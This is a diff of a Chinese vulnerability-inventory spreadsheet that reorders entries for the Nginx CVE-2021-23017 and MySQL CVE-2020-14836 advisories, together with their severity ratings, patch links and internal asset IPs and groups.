+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G43" t="inlineStr">
@@ -6318,7 +6318,7 @@
       </c>
       <c r="J43" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K43" t="inlineStr">

--- a/安全体检报告/风险清单/漏洞清单.xlsx
+++ b/安全体检报告/风险清单/漏洞清单.xlsx
@@ -2645,12 +2645,12 @@
       </c>
       <c r="M16" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>192.168.54.213</t>
         </is>
       </c>
       <c r="N16" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O16" t="inlineStr">
@@ -2660,7 +2660,7 @@
       </c>
       <c r="P16" t="inlineStr">
         <is>
-          <t>子组名</t>
+          <t>test1111</t>
         </is>
       </c>
       <c r="Q16" t="inlineStr"/>
@@ -2671,7 +2671,7 @@
       </c>
       <c r="S16" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T16" t="inlineStr">
@@ -2783,7 +2783,7 @@
       </c>
       <c r="M17" t="inlineStr">
         <is>
-          <t>192.168.54.68</t>
+          <t>192.168.51.66</t>
         </is>
       </c>
       <c r="N17" t="inlineStr">
@@ -2798,7 +2798,7 @@
       </c>
       <c r="P17" t="inlineStr">
         <is>
-          <t>父组名</t>
+          <t>子组名</t>
         </is>
       </c>
       <c r="Q17" t="inlineStr"/>
@@ -3059,12 +3059,12 @@
       </c>
       <c r="M19" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>192.168.54.68</t>
         </is>
       </c>
       <c r="N19" t="inlineStr">
         <is>
-          <t>其他</t>
+          <t>服务器</t>
         </is>
       </c>
       <c r="O19" t="inlineStr">
@@ -3074,7 +3074,7 @@
       </c>
       <c r="P19" t="inlineStr">
         <is>
-          <t>test1111</t>
+          <t>父组名</t>
         </is>
       </c>
       <c r="Q19" t="inlineStr"/>
@@ -3085,7 +3085,7 @@
       </c>
       <c r="S19" t="inlineStr">
         <is>
-          <t>台账资产</t>
+          <t>退库资产</t>
         </is>
       </c>
       <c r="T19" t="inlineStr">
@@ -3171,7 +3171,7 @@
       </c>
       <c r="H20" t="inlineStr">
         <is>
-          <t>STA、SIP</t>
+          <t>SIP、STA</t>
         </is>
       </c>
       <c r="I20" t="inlineStr">
@@ -3456,7 +3456,7 @@
     <row r="22">
       <c r="A22" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B22" t="inlineStr">
@@ -3466,18 +3466,18 @@
       </c>
       <c r="C22" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D22" t="inlineStr"/>
       <c r="E22" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F22" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G22" t="inlineStr">
@@ -3497,7 +3497,7 @@
       </c>
       <c r="J22" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K22" t="inlineStr">
@@ -3589,7 +3589,7 @@
     <row r="23">
       <c r="A23" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B23" t="inlineStr">
@@ -3599,18 +3599,18 @@
       </c>
       <c r="C23" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D23" t="inlineStr"/>
       <c r="E23" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F23" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G23" t="inlineStr">
@@ -3630,7 +3630,7 @@
       </c>
       <c r="J23" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K23" t="inlineStr">
@@ -3722,7 +3722,7 @@
     <row r="24">
       <c r="A24" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B24" t="inlineStr">
@@ -3732,18 +3732,18 @@
       </c>
       <c r="C24" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D24" t="inlineStr"/>
       <c r="E24" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F24" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G24" t="inlineStr">
@@ -3763,7 +3763,7 @@
       </c>
       <c r="J24" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K24" t="inlineStr">
@@ -3855,7 +3855,7 @@
     <row r="25">
       <c r="A25" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B25" t="inlineStr">
@@ -3865,18 +3865,18 @@
       </c>
       <c r="C25" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D25" t="inlineStr"/>
       <c r="E25" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F25" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G25" t="inlineStr">
@@ -3896,7 +3896,7 @@
       </c>
       <c r="J25" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K25" t="inlineStr">
@@ -5052,7 +5052,7 @@
     <row r="34">
       <c r="A34" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B34" t="inlineStr">
@@ -5062,18 +5062,18 @@
       </c>
       <c r="C34" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D34" t="inlineStr"/>
       <c r="E34" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F34" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G34" t="inlineStr">
@@ -5093,7 +5093,7 @@
       </c>
       <c r="J34" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K34" t="inlineStr">
@@ -5185,7 +5185,7 @@
     <row r="35">
       <c r="A35" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B35" t="inlineStr">
@@ -5195,18 +5195,18 @@
       </c>
       <c r="C35" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D35" t="inlineStr"/>
       <c r="E35" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F35" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G35" t="inlineStr">
@@ -5226,7 +5226,7 @@
       </c>
       <c r="J35" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K35" t="inlineStr">
@@ -5318,7 +5318,7 @@
     <row r="36">
       <c r="A36" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B36" t="inlineStr">
@@ -5328,18 +5328,18 @@
       </c>
       <c r="C36" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D36" t="inlineStr"/>
       <c r="E36" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F36" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G36" t="inlineStr">
@@ -5359,7 +5359,7 @@
       </c>
       <c r="J36" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K36" t="inlineStr">
@@ -5374,12 +5374,12 @@
       </c>
       <c r="M36" t="inlineStr">
         <is>
-          <t>192.168.54.174</t>
+          <t>192.168.54.213</t>
         </is>
       </c>
       <c r="N36" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O36" t="inlineStr">
@@ -5400,7 +5400,7 @@
       </c>
       <c r="S36" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T36" t="inlineStr">
@@ -5455,7 +5455,7 @@
     <row r="37">
       <c r="A37" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B37" t="inlineStr">
@@ -5465,18 +5465,18 @@
       </c>
       <c r="C37" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D37" t="inlineStr"/>
       <c r="E37" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F37" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G37" t="inlineStr">
@@ -5496,7 +5496,7 @@
       </c>
       <c r="J37" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K37" t="inlineStr">
@@ -5511,12 +5511,12 @@
       </c>
       <c r="M37" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>192.168.54.213</t>
         </is>
       </c>
       <c r="N37" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O37" t="inlineStr">
@@ -5526,7 +5526,7 @@
       </c>
       <c r="P37" t="inlineStr">
         <is>
-          <t>子组名</t>
+          <t>test1111</t>
         </is>
       </c>
       <c r="Q37" t="inlineStr"/>
@@ -5537,7 +5537,7 @@
       </c>
       <c r="S37" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T37" t="inlineStr">
@@ -5648,12 +5648,12 @@
       </c>
       <c r="M38" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>192.168.54.174</t>
         </is>
       </c>
       <c r="N38" t="inlineStr">
         <is>
-          <t>其他</t>
+          <t>服务器</t>
         </is>
       </c>
       <c r="O38" t="inlineStr">
@@ -5674,7 +5674,7 @@
       </c>
       <c r="S38" t="inlineStr">
         <is>
-          <t>台账资产</t>
+          <t>退库资产</t>
         </is>
       </c>
       <c r="T38" t="inlineStr">
@@ -5785,12 +5785,12 @@
       </c>
       <c r="M39" t="inlineStr">
         <is>
-          <t>192.168.54.213</t>
+          <t>192.168.51.66</t>
         </is>
       </c>
       <c r="N39" t="inlineStr">
         <is>
-          <t>其他</t>
+          <t>服务器</t>
         </is>
       </c>
       <c r="O39" t="inlineStr">
@@ -5800,7 +5800,7 @@
       </c>
       <c r="P39" t="inlineStr">
         <is>
-          <t>test1111</t>
+          <t>子组名</t>
         </is>
       </c>
       <c r="Q39" t="inlineStr"/>
@@ -5811,7 +5811,7 @@
       </c>
       <c r="S39" t="inlineStr">
         <is>
-          <t>台账资产</t>
+          <t>退库资产</t>
         </is>
       </c>
       <c r="T39" t="inlineStr">
@@ -5866,7 +5866,7 @@
     <row r="40">
       <c r="A40" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B40" t="inlineStr">
@@ -5876,18 +5876,18 @@
       </c>
       <c r="C40" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D40" t="inlineStr"/>
       <c r="E40" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F40" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G40" t="inlineStr">
@@ -5907,7 +5907,7 @@
       </c>
       <c r="J40" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K40" t="inlineStr">
@@ -5922,7 +5922,7 @@
       </c>
       <c r="M40" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>192.168.54.68</t>
         </is>
       </c>
       <c r="N40" t="inlineStr">
@@ -5937,7 +5937,7 @@
       </c>
       <c r="P40" t="inlineStr">
         <is>
-          <t>子组名</t>
+          <t>父组名</t>
         </is>
       </c>
       <c r="Q40" t="inlineStr"/>
@@ -6003,7 +6003,7 @@
     <row r="41">
       <c r="A41" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
         </is>
       </c>
       <c r="B41" t="inlineStr">
@@ -6013,18 +6013,18 @@
       </c>
       <c r="C41" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D41" t="inlineStr"/>
       <c r="E41" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
         </is>
       </c>
       <c r="F41" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
         </is>
       </c>
       <c r="G41" t="inlineStr">
@@ -6044,7 +6044,7 @@
       </c>
       <c r="J41" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2021-23017</t>
         </is>
       </c>
       <c r="K41" t="inlineStr">
@@ -6059,7 +6059,7 @@
       </c>
       <c r="M41" t="inlineStr">
         <is>
-          <t>192.168.54.68</t>
+          <t>192.168.54.174</t>
         </is>
       </c>
       <c r="N41" t="inlineStr">
@@ -6074,7 +6074,7 @@
       </c>
       <c r="P41" t="inlineStr">
         <is>
-          <t>父组名</t>
+          <t>test1111</t>
         </is>
       </c>
       <c r="Q41" t="inlineStr"/>
@@ -6140,7 +6140,7 @@
     <row r="42">
       <c r="A42" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B42" t="inlineStr">
@@ -6150,18 +6150,18 @@
       </c>
       <c r="C42" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D42" t="inlineStr"/>
       <c r="E42" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F42" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G42" t="inlineStr">
@@ -6181,7 +6181,7 @@
       </c>
       <c r="J42" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K42" t="inlineStr">
@@ -6277,7 +6277,7 @@
     <row r="43">
       <c r="A43" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
         </is>
       </c>
       <c r="B43" t="inlineStr">
@@ -6287,18 +6287,18 @@
       </c>
       <c r="C43" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D43" t="inlineStr"/>
       <c r="E43" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
         </is>
       </c>
       <c r="F43" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
         </is>
       </c>
       <c r="G43" t="inlineStr">
@@ -6318,7 +6318,7 @@
       </c>
       <c r="J43" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-14836</t>
         </is>
       </c>
       <c r="K43" t="inlineStr">
@@ -6333,7 +6333,7 @@
       </c>
       <c r="M43" t="inlineStr">
         <is>
-          <t>192.168.54.174</t>
+          <t>192.168.51.66</t>
         </is>
       </c>
       <c r="N43" t="inlineStr">
@@ -6348,7 +6348,7 @@
       </c>
       <c r="P43" t="inlineStr">
         <is>
-          <t>test1111</t>
+          <t>子组名</t>
         </is>
       </c>
       <c r="Q43" t="inlineStr"/>
